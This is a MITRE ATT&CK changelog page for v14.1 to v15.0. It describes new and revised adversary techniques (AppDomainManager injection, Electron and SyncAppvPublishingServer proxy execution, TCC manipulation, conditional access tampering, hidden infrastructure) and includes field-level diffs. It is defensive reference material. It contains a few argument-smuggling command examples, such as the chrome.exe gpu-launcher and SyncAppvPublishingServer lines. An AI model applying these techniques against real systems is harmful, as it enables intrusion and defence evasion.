ATT&CK Changes Between v14.1 and v15.0

Key

Colors for description field
Added
Changed
Deleted

Additional formats

These ATT&CK Navigator layer files can be uploaded to ATT&CK Navigator manually.

This JSON file contains the machine readble output used to create this page: changelog.json

Techniques

enterprise-attack

New Techniques

[T1574.014] Hijack Execution Flow: AppDomainManager

Current version: 1.0

Description: Adversaries may execute their own malicious payloads by hijacking how the .NET `AppDomainManager` loads assemblies. The .NET framework uses the `AppDomainManager` class to create and manage one or more isolated runtime environments (called application domains) inside a process to host the execution of .NET applications. Assemblies (`.exe` or `.dll` binaries compiled to run as .NET code) may be loaded into an application domain as executable code.(Citation: Microsoft App Domains) Known as "AppDomainManager injection," adversaries may execute arbitrary code by hijacking how .NET applications load assemblies. For example, malware may create a custom application domain inside a target process to load and execute an arbitrary assembly. Alternatively, configuration files (`.config`) or process environment variables that define .NET runtime settings may be tampered with to instruct otherwise benign .NET applications to load a malicious assembly (identified by name) into the target process.(Citation: PenTestLabs AppDomainManagerInject)(Citation: PwC Yellow Liderc)(Citation: Rapid7 AppDomain Manager Injection)


[T1588.007] Obtain Capabilities: Artificial Intelligence

Current version: 1.0

Description: Adversaries may obtain access to generative artificial intelligence tools, such as large language models (LLMs), to aid various techniques during targeting. These tools may be used to inform, bolster, and enable a variety of malicious tasks including conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043), creating basic scripts, assisting social engineering, and even developing payloads.(Citation: MSFT-AI) For example, by utilizing a publicly available LLM an adversary is essentially outsourcing or automating certain tasks to the tool. Using AI, the adversary may draft and generate content in a variety of written languages to be used in [Phishing](https://attack.mitre.org/techniques/T1566)/[Phishing for Information](https://attack.mitre.org/techniques/T1598) campaigns. The same publicly available tool may further enable vulnerability or other offensive research supporting [Develop Capabilities](https://attack.mitre.org/techniques/T1587). AI tools may also automate technical tasks by generating, refining, or otherwise enhancing (e.g., [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)) malicious scripts and payloads.(Citation: OpenAI-CTI)


[T1059.010] Command and Scripting Interpreter: AutoHotKey & AutoIT

Current version: 1.0

Description: Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey) Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate) These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)


[T1556.009] Modify Authentication Process: Conditional Access Policies

Current version: 1.0

Description: Adversaries may disable or modify conditional access policies to enable persistent access to compromised accounts. Conditional access policies are additional verifications used by identity providers and identity and access management systems to determine whether a user should be granted access to a resource. For example, in Azure AD, Okta, and JumpCloud, users can be denied access to applications based on their IP address, device enrollment status, and use of multi-factor authentication.(Citation: Microsoft Conditional Access)(Citation: JumpCloud Conditional Access Policies)(Citation: Okta Conditional Access Policies) In some cases, identity providers may also support the use of risk-based metrics to deny sign-ins based on a variety of indicators. In AWS and GCP, IAM policies can contain `condition` attributes that verify arbitrary constraints such as the source IP, the date the request was made, and the nature of the resources or regions being requested.(Citation: AWS IAM Conditions)(Citation: GCP IAM Conditions) These measures help to prevent compromised credentials from resulting in unauthorized access to data or resources, as well as limit user permissions to only those required. By modifying conditional access policies, such as adding additional trusted IP ranges, removing [Multi-Factor Authentication](https://attack.mitre.org/techniques/T1556/006) requirements, or allowing additional [Unused/Unsupported Cloud Regions](https://attack.mitre.org/techniques/T1535), adversaries may be able to ensure persistent access to accounts and circumvent defensive measures.


[T1543.005] Create or Modify System Process: Container Service

Current version: 1.0

Description: Adversaries may create or modify container or container cluster management tools that run as daemons, agents, or services on individual hosts. These include software for creating and managing individual containers, such as Docker and Podman, as well as container cluster node-level agents such as kubelet. By modifying these services, an adversary may be able to achieve persistence or escalate their privileges on a host. For example, by using the `docker run` or `podman run` command with the `restart=always` directive, a container can be configured to persistently restart on the host.(Citation: AquaSec TeamTNT 2023) A user with access to the (rootful) docker command may also be able to escalate their privileges on the host.(Citation: GTFOBins Docker) In Kubernetes environments, DaemonSets allow an adversary to persistently [Deploy Container](https://attack.mitre.org/techniques/T1610)s on all nodes, including ones added later to the cluster.(Citation: Aquasec Kubernetes Attack 2023)(Citation: Kubernetes DaemonSet) Pods can also be deployed to specific nodes using the `nodeSelector` or `nodeName` fields in the pod spec.(Citation: Kubernetes Assigning Pods to Nodes)(Citation: AppSecco Kubernetes Namespace Breakout 2020) Note that containers can also be configured to run as [Systemd Service](https://attack.mitre.org/techniques/T1543/002)s.(Citation: Podman Systemd)(Citation: Docker Systemd)


[T1218.015] System Binary Proxy Execution: Electron Applications

Current version: 1.0

Description: Adversaries may abuse components of the Electron framework to execute malicious code. The Electron framework hosts many common applications such as Signal, Slack, and Microsoft Teams.(Citation: Electron 2) Originally developed by GitHub, Electron is a cross-platform desktop application development framework that employs web technologies like JavaScript, HTML, and CSS.(Citation: Electron 3) The Chromium engine is used to display web content and Node.js runs the backend code.(Citation: Electron 1) Due to the functional mechanics of Electron (such as allowing apps to run arbitrary commands), adversaries may also be able to perform malicious functions in the background potentially disguised as legitimate tools within the framework.(Citation: Electron 1) For example, the abuse of `teams.exe` and `chrome.exe` may allow adversaries to execute malicious commands as child processes of the legitimate application (e.g., `chrome.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c calc.exe`).(Citation: Electron 6-8) Adversaries may also execute malicious content by planting malicious [JavaScript](https://attack.mitre.org/techniques/T1059/007) within Electron applications.(Citation: Electron Security)


[T1027.013] Obfuscated Files or Information: Encrypted/Encoded File

Current version: 1.0

Description: Adversaries may encrypt or encode files to obfuscate strings, bytes, and other specific patterns to impede detection. Encrypting and/or encoding file content aims to conceal malicious artifacts within a file used in an intrusion. Many other techniques, such as [Software Packing](https://attack.mitre.org/techniques/T1027/002), [Steganography](https://attack.mitre.org/techniques/T1027/003), and [Embedded Payloads](https://attack.mitre.org/techniques/T1027/009), share this same broad objective. Encrypting and/or encoding files could lead to a lapse in detection of static signatures, only for this malicious content to be revealed (i.e., [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)) at the time of execution/use. This type of file obfuscation can be applied to many file artifacts present on victim hosts, such as malware log/configuration and payload files.(Citation: File obfuscation) Files can be encrypted with a hardcoded or user-supplied key, as well as otherwise obfuscated using standard encoding/compression schemes such as Base64. The entire content of a file may be obfuscated, or just specific functions or values (such as C2 addresses). Encryption and encoding may also be applied in redundant layers for additional protection. For example, adversaries may abuse password-protected Word documents or self-extracting (SFX) archives as a method of encrypting/encoding a file such as a [Phishing](https://attack.mitre.org/techniques/T1566) payload. These files typically function by attaching the intended archived content to a decompressor stub that is executed when the file is invoked (e.g., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: SFX - Encrypted/Encoded File) Adversaries may also abuse file-specific as well as custom encoding schemes. For example, Byte Order Mark (BOM) headers in text files may be abused to manipulate and obfuscate file content until [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) execution.


[T1564.012] Hide Artifacts: File/Path Exclusions

Current version: 1.0

Description: Adversaries may attempt to hide their file-based artifacts by writing them to specific folders or file names excluded from antivirus (AV) scanning and other defensive capabilities. AV and other file-based scanners often include exclusions to optimize performance as well as ease installation and legitimate use of applications. These exclusions may be contextual (e.g., scans are only initiated in response to specific triggering events/alerts), but are also often hardcoded strings referencing specific folders and/or files assumed to be trusted and legitimate.(Citation: Microsoft File Folder Exclusions) Adversaries may abuse these exclusions to hide their file-based artifacts. For example, rather than tampering with tool settings to add a new exclusion (i.e., [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001)), adversaries may drop their file-based payloads in default or otherwise well-known exclusions. Adversaries may also use [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001) and other [Discovery](https://attack.mitre.org/tactics/TA0007)/[Reconnaissance](https://attack.mitre.org/tactics/TA0043) activities to both discover and verify existing exclusions in a victim environment.


[T1665] Hide Infrastructure

Current version: 1.0

Description: Adversaries may manipulate network traffic in order to hide and evade detection of their C2 infrastructure. This can be accomplished in various ways including by identifying and filtering traffic from defensive tools,(Citation: TA571) masking malicious domains to obfuscate the true destination from both automated scanning tools and security researchers,(Citation: Schema-abuse)(Citation: Facad1ng)(Citation: Browser-updates) and otherwise hiding malicious artifacts to delay discovery and prolong the effectiveness of adversary infrastructure that could otherwise be identified, blocked, or taken down entirely. C2 networks may include the use of [Proxy](https://attack.mitre.org/techniques/T1090) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections. For example, an adversary may use a virtual private cloud to spoof their IP address to closer align with a victim's IP address ranges. This may also bypass security measures relying on geolocation of the source IP address.(Citation: sysdig)(Citation: Orange Residential Proxies) Adversaries may also attempt to filter network traffic in order to evade defensive tools in numerous ways, including blocking/redirecting common incident responder or security appliance user agents.(Citation: mod_rewrite)(Citation: SocGholish-update) Filtering traffic based on IP and geo-fencing may also avoid automated sandboxing or researcher activity (i.e., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)).(Citation: TA571)(Citation: mod_rewrite) Hiding C2 infrastructure may also be supported by [Resource Development](https://attack.mitre.org/tactics/TA0042) activities such as [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) and [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584). For example, using widely trusted hosting services or domains such as prominent URL shortening providers or marketing services for C2 networks may enable adversaries to present benign content that later redirects victims to malicious web pages or infrastructure once specific conditions are met.(Citation: StarBlizzard)(Citation: QR-cofense)


[T1584.008] Compromise Infrastructure: Network Devices

Current version: 1.0

Description: Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting. Once an adversary has control, compromised network devices can be used to launch additional operations, such as hosting payloads for [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (i.e., [Link Target](https://attack.mitre.org/techniques/T1608/005)) or enabling the required access to execute [Content Injection](https://attack.mitre.org/techniques/T1659) operations. Adversaries may also be able to harvest reusable credentials (i.e., [Valid Accounts](https://attack.mitre.org/techniques/T1078)) from compromised network devices. Adversaries often target Internet-facing edge devices and related network appliances that specifically do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar) Compromised network devices may be used to support subsequent [Command and Control](https://attack.mitre.org/tactics/TA0011) activity, such as [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) through an established [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Botnet](https://attack.mitre.org/techniques/T1584/005) network.(Citation: Justice GRU 2024)


[T1216.002] System Script Proxy Execution: SyncAppvPublishingServer

Current version: 1.0

Description: Adversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv) The SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\System32` through the command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv) Adversaries may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and evade defensive counter measures by "living off the land."(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation: 7 - appv) For example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may be invoked using:(Citation: 5 - appv) `SyncAppvPublishingServer.vbs "n; {PowerShell}"`


[T1548.006] Abuse Elevation Control Mechanism: TCC Manipulation

Current version: 1.0

Description: Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to execute malicious applications with elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA). When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC) Adversaries may manipulate the TCC database or otherwise abuse the TCC service to execute malicious content. This can be done in various ways, including using privileged system applications to execute malicious payloads or manipulating the database to grant their application TCC permissions. For example, adversaries can use Finder, which has FDA permissions by default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) while preventing a user prompt. For a system without System Integrity Protection (SIP) enabled, adversaries have also manipulated the operating system to load an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database) Adversaries may also opt to instead inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055)) into targeted applications with the desired TCC permissions.

Major Version Changes

[T1651] Cloud Administration Command

Current version: 2.0

Version changed from: 1.0 → 2.0


Old Description
New Description
t1Adversaries may abuse cloud management services to execute ct1Adversaries may abuse cloud management services to execute c
>ommands within virtual machines or hybrid-joined devices. Re>ommands within virtual machines. Resources such as AWS Syste
>sources such as AWS Systems Manager, Azure RunCommand, and R>ms Manager, Azure RunCommand, and Runbooks allow users to re
>unbooks allow users to remotely run scripts in virtual machi>motely run scripts in virtual machines by leveraging install
>nes by leveraging installed virtual machine agents. Similarl>ed virtual machine agents. (Citation: AWS Systems Manager Ru
>y, in Azure AD environments, Microsoft Endpoint Manager allo>n Command)(Citation: Microsoft Run Command)  If an adversary
>ws Global or Intune Administrators to run scripts as SYSTEM > gains administrative access to a cloud environment, they ma
>on on-premises devices joined to the Azure AD.(Citation: AWS>y be able to abuse cloud management services to execute comm
> Systems Manager Run Command)(Citation: Microsoft Run Comman>ands in the environment’s virtual machines. Additionally, an
>d)(Citation: SpecterOps Lateral Movement from Azure to On-Pr> adversary that compromises a service provider or delegated 
>em AD 2020)  If an adversary gains administrative access to >administrator account may similarly be able to leverage a [T
>a cloud environment, they may be able to abuse cloud managem>rusted Relationship](https://attack.mitre.org/techniques/T11
>ent services to execute commands in the environment’s virtua>99) to execute commands in connected virtual machines.(Citat
>l machines or on-premises hybrid-joined devices. Additionall>ion: MSTIC Nobelium Oct 2021)
>y, an adversary that compromises a service provider or deleg 
>ated administrator account may similarly be able to leverage 
> a [Trusted Relationship](https://attack.mitre.org/technique 
>s/T1199) to execute commands in connected virtual machines.( 
>Citation: MSTIC Nobelium Oct 2021) 
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-14 19:01:12.963000+00:002024-04-12 03:27:48.171000+00:00
descriptionAdversaries may abuse cloud management services to execute commands within virtual machines or hybrid-joined devices. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. Similarly, in Azure AD environments, Microsoft Endpoint Manager allows Global or Intune Administrators to run scripts as SYSTEM on on-premises devices joined to the Azure AD.(Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command)(Citation: SpecterOps Lateral Movement from Azure to On-Prem AD 2020) If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines or on-premises hybrid-joined devices. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)Adversaries may abuse cloud management services to execute commands within virtual machines. Resources such as AWS Systems Manager, Azure RunCommand, and Runbooks allow users to remotely run scripts in virtual machines by leveraging installed virtual machine agents. (Citation: AWS Systems Manager Run Command)(Citation: Microsoft Run Command) If an adversary gains administrative access to a cloud environment, they may be able to abuse cloud management services to execute commands in the environment’s virtual machines. Additionally, an adversary that compromises a service provider or delegated administrator account may similarly be able to leverage a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) to execute commands in connected virtual machines.(Citation: MSTIC Nobelium Oct 2021)
x_mitre_attack_spec_version3.1.03.2.0
x_mitre_version1.02.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsTamir Yehuda
iterable_item_removed
STIX FieldOld valueNew Value
external_references{'source_name': 'SpecterOps Lateral Movement from Azure to On-Prem AD 2020', 'description': 'Andy Robbins. (2020, August 17). Death from Above: Lateral Movement from Azure to On-Prem AD. Retrieved March 13, 2023.', 'url': 'https://posts.specterops.io/death-from-above-lateral-movement-from-azure-to-on-prem-ad-d18cb3959d4d'}
x_mitre_platformsAzure AD

[T1554] Compromise Host Software Binary

Current version: 2.0

Version changed from: 1.1 → 2.0


Old Description
New Description
t1Adversaries may modify client software binaries to establisht1Adversaries may modify host software binaries to establish p
> persistent access to systems. Client software enables users>ersistent access to systems. Software binaries/executables p
> to access services provided by a server. Common client soft>rovide a wide range of system commands or services, programs
>ware types are SSH clients, FTP clients, email clients, and >, and libraries. Common software binaries are SSH clients, F
>web browsers.  Adversaries may make modifications to client >TP clients, email clients, web browsers, and many other user
>software binaries to carry out malicious tasks when those ap> or server applications.  Adversaries may establish persiste
>plications are in use. For example, an adversary may copy so>nce though modifications to host software binaries. For exam
>urce code for the client software, add a backdoor, compile f>ple, an adversary may replace or otherwise infect a legitima
>or the target, and replace the legitimate application binary>te application binary (or support files) with a backdoor. Si
> (or support files) with the backdoored one. An adversary ma>nce these binaries may be routinely executed by applications
>y also modify an existing binary by patching in malicious fu> or the user, the adversary can leverage this for persistent
>nctionality (e.g., IAT Hooking/Entry point patching)(Citatio> access to the host.  An adversary may also modify an existi
>n: Unit42 Banking Trojans Hooking 2022) prior to the binary’>ng binary by patching in malicious functionality (e.g., IAT 
>s legitimate execution. For example, an adversary may modify>Hooking/Entry point patching)(Citation: Unit42 Banking Troja
> the entry point of a binary to point to malicious code patc>ns Hooking 2022) prior to the binary’s legitimate execution.
>hed in by the adversary before resuming normal execution flo> For example, an adversary may modify the entry point of a b
>w.(Citation: ESET FontOnLake Analysis 2021)  Since these app>inary to point to malicious code patched in by the adversary
>lications may be routinely executed by the user, the adversa> before resuming normal execution flow.(Citation: ESET FontO
>ry can leverage this for persistent access to the host.>nLake Analysis 2021)
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-03 04:18:40.956000+00:002024-04-16 13:03:40.824000+00:00
nameCompromise Client Software BinaryCompromise Host Software Binary
descriptionAdversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers. Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, compile for the target, and replace the legitimate application binary (or support files) with the backdoored one. An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021) Since these applications may be routinely executed by the user, the adversary can leverage this for persistent access to the host.Adversaries may modify host software binaries to establish persistent access to systems. Software binaries/executables provide a wide range of system commands or services, programs, and libraries. Common software binaries are SSH clients, FTP clients, email clients, web browsers, and many other user or server applications. Adversaries may establish persistence though modifications to host software binaries. For example, an adversary may replace or otherwise infect a legitimate application binary (or support files) with a backdoor. Since these binaries may be routinely executed by applications or the user, the adversary can leverage this for persistent access to the host. An adversary may also modify an existing binary by patching in malicious functionality (e.g., IAT Hooking/Entry point patching)(Citation: Unit42 Banking Trojans Hooking 2022) prior to the binary’s legitimate execution. For example, an adversary may modify the entry point of a binary to point to malicious code patched in by the adversary before resuming normal execution flow.(Citation: ESET FontOnLake Analysis 2021)
x_mitre_version1.12.0

[T1484] Domain or Tenant Policy Modification

Current version: 3.0

Version changed from: 2.0 → 3.0


Old Description
New Description
t1Adversaries may modify the configuration settings of a domait1Adversaries may modify the configuration settings of a domai
>n to evade defenses and/or escalate privileges in domain env>n or identity tenant to evade defenses and/or escalate privi
>ironments. Domains provide a centralized means of managing h>leges in centrally managed environments. Such services provi
>ow computer resources (ex: computers, user accounts) can act>de a centralized means of managing identity resources such a
>, and interact with each other, on a network. The policy of >s devices and accounts, and often include configuration sett
>the domain also includes configuration settings that may app>ings that may apply between domains or tenants such as trust
>ly between domains in a multi-domain/forest environment. Mod> relationships, identity syncing, or identity federation.  M
>ifications to domain settings may include altering domain Gr>odifications to domain or tenant settings may include alteri
>oup Policy Objects (GPOs) or changing trust settings for dom>ng domain Group Policy Objects (GPOs) in Microsoft Active Di
>ains, including federation trusts.  With sufficient permissi>rectory (AD) or changing trust settings for domains, includi
>ons, adversaries can modify domain policy settings. Since do>ng federation trusts relationships between domains or tenant
>main configuration settings control many of the interactions>s.  With sufficient permissions, adversaries can modify doma
> within the Active Directory (AD) environment, there are a g>in or tenant policy settings. Since configuration settings f
>reat number of potential attacks that can stem from this abu>or these services apply to a large number of identity resour
>se. Examples of such abuse include modifying GPOs to push a >ces, there are a great number of potential attacks malicious
>malicious [Scheduled Task](https://attack.mitre.org/techniqu> outcomes that can stem from this abuse. Examples of such ab
>es/T1053/005) to computers throughout the domain environment>use include:    * modifying GPOs to push a malicious [Schedu
>(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 >led Task](https://attack.mitre.org/techniques/T1053/005) to 
>Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or>computers throughout the domain environment(Citation: ADSecu
> modifying domain trusts to include an adversary controlled >rity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Ci
>domain where they can control access tokens that will subseq>tation: Harmj0y Abusing GPO Permissions) * modifying domain 
>uently be accepted by victim domain resources.(Citation: Mic>trusts to include an adversary-controlled domain, allowing a
>rosoft - Customer Guidance on Recent Nation-State Cyber Atta>dversaries to  forge access tokens that will subsequently be
>cks) Adversaries can also change configuration settings with> accepted by victim domain resources(Citation: Microsoft - C
>in the AD environment to implement a [Rogue Domain Controlle>ustomer Guidance on Recent Nation-State Cyber Attacks) * cha
>r](https://attack.mitre.org/techniques/T1207).  Adversaries >nging configuration settings within the AD environment to im
>may temporarily modify domain policy, carry out a malicious >plement a [Rogue Domain Controller](https://attack.mitre.org
>action(s), and then revert the change to remove suspicious i>/techniques/T1207). * adding new, adversary-controlled feder
>ndicators.>ated identity providers to identity tenants, allowing advers
 >aries to authenticate as any user managed by the victim tena
 >nt (Citation: Okta Cross-Tenant Impersonation 2023)  Adversa
 >ries may temporarily modify domain or tenant policy, carry o
 >ut a malicious action(s), and then revert the change to remo
 >ve suspicious indicators.

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_contributors['Obsidian Security']
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2021-02-09 15:52:24.598000+00:002024-04-19 04:27:31.884000+00:00
nameDomain Policy ModificationDomain or Tenant Policy Modification
descriptionAdversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts. With sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207). Adversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.Adversaries may modify the configuration settings of a domain or identity tenant to evade defenses and/or escalate privileges in centrally managed environments. Such services provide a centralized means of managing identity resources such as devices and accounts, and often include configuration settings that may apply between domains or tenants such as trust relationships, identity syncing, or identity federation. Modifications to domain or tenant settings may include altering domain Group Policy Objects (GPOs) in Microsoft Active Directory (AD) or changing trust settings for domains, including federation trusts relationships between domains or tenants. With sufficient permissions, adversaries can modify domain or tenant policy settings. Since configuration settings for these services apply to a large number of identity resources, there are a great number of potential attacks malicious outcomes that can stem from this abuse. Examples of such abuse include: * modifying GPOs to push a malicious [Scheduled Task](https://attack.mitre.org/techniques/T1053/005) to computers throughout the domain environment(Citation: ADSecurity GPO Persistence 2016)(Citation: Wald0 Guide to GPOs)(Citation: Harmj0y Abusing GPO Permissions) * modifying domain trusts to include an adversary-controlled domain, allowing adversaries to forge access tokens that will subsequently be accepted by victim domain resources(Citation: Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks) * changing configuration settings within the AD environment to implement a [Rogue Domain Controller](https://attack.mitre.org/techniques/T1207). * adding new, adversary-controlled federated identity providers to identity tenants, allowing adversaries to authenticate as any user managed by the victim tenant (Citation: Okta Cross-Tenant Impersonation 2023) Adversaries may temporarily modify domain or tenant policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.
x_mitre_version2.03.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Okta Cross-Tenant Impersonation 2023', 'description': 'Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.', 'url': 'https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection'}
x_mitre_data_sourcesApplication Log: Application Log Content
x_mitre_platformsSaaS

[T1072] Software Deployment Tools

Current version: 3.0

Version changed from: 2.2 → 3.0


Old Description
New Description
t1Adversaries may gain access to and use third-party software t1Adversaries may gain access to and use centralized software 
>suites installed within an enterprise network, such as admin>suites installed within an enterprise to execute commands an
>istration, monitoring, and deployment systems, to move later>d move laterally through the network. Configuration manageme
>ally through the network. Third-party applications and softw>nt and software deployment applications may be used in an en
>are deployment systems may be in use in the network environm>terprise network or cloud environment for routine administra
>ent for administration purposes (e.g., SCCM, HBSS, Altiris, >tion purposes. These systems may also be integrated into CI/
>etc.).    Access to a third-party network-wide or enterprise>CD pipelines. Examples of such solutions include: SCCM, HBSS
>-wide software system may enable an adversary to have remote>, Altiris, AWS Systems Manager, Microsoft Intune, Azure Arc,
> code execution on all systems that are connected to such a > and GCP Deployment Manager.    Access to network-wide or en
>system. The access may be used to laterally move to other sy>terprise-wide endpoint management software may enable an adv
>stems, gather information, or cause a specific effect, such >ersary to achieve remote code execution on all connected sys
>as wiping the hard drives on all endpoints. Network infrastr>tems. The access may be used to laterally move to other syst
>ucture may also have administration tools that can be simila>ems, gather information, or cause a specific effect, such as
>rly abused by adversaries. (Citation: Fortinet Zero-Day and > wiping the hard drives on all endpoints.  SaaS-based config
>Custom Malware Used by Suspected Chinese Actor in Espionage >uration management services may allow for broad [Cloud Admin
>Operation)  The permissions required for this action vary by>istration Command](https://attack.mitre.org/techniques/T1651
> system configuration; local credentials may be sufficient w>) on cloud-hosted instances, as well as the execution of arb
>ith direct access to the third-party system, or specific dom>itrary commands on on-premises endpoints. For example, Micro
>ain credentials may be required. However, the system may req>soft Configuration Manager allows Global or Intune Administr
>uire an administrative account to log in or to perform it's >ators to run scripts as SYSTEM on on-premises devices joined
>intended purpose.> to Azure AD.(Citation: SpecterOps Lateral Movement from Azu
 >re to On-Prem AD 2020) Such services may also utilize [Web P
 >rotocols](https://attack.mitre.org/techniques/T1071/001) to 
 >communicate back to adversary owned infrastructure.(Citation
 >: Mitiga Security Advisory: SSM Agent as Remote Access Troja
 >n)  Network infrastructure devices may also have configurati
 >on management tools that can be similarly abused by adversar
 >ies.(Citation: Fortinet Zero-Day and Custom Malware Used by 
 >Suspected Chinese Actor in Espionage Operation)  The permiss
 >ions required for this action vary by system configuration; 
 >local credentials may be sufficient with direct access to th
 >e third-party system, or specific domain credentials may be 
 >required. However, the system may require an administrative 
 >account to log in or to access specific functionality.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-27 20:31:36.724000+00:002024-04-12 03:40:37.954000+00:00
descriptionAdversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to other systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints. Network infrastructure may also have administration tools that can be similarly abused by adversaries. (Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation) The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the third-party system, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform it's intended purpose.Adversaries may gain access to and use centralized software suites installed within an enterprise to execute commands and move laterally through the network. Configuration management and software deployment applications may be used in an enterprise network or cloud environment for routine administration purposes. These systems may also be integrated into CI/CD pipelines. 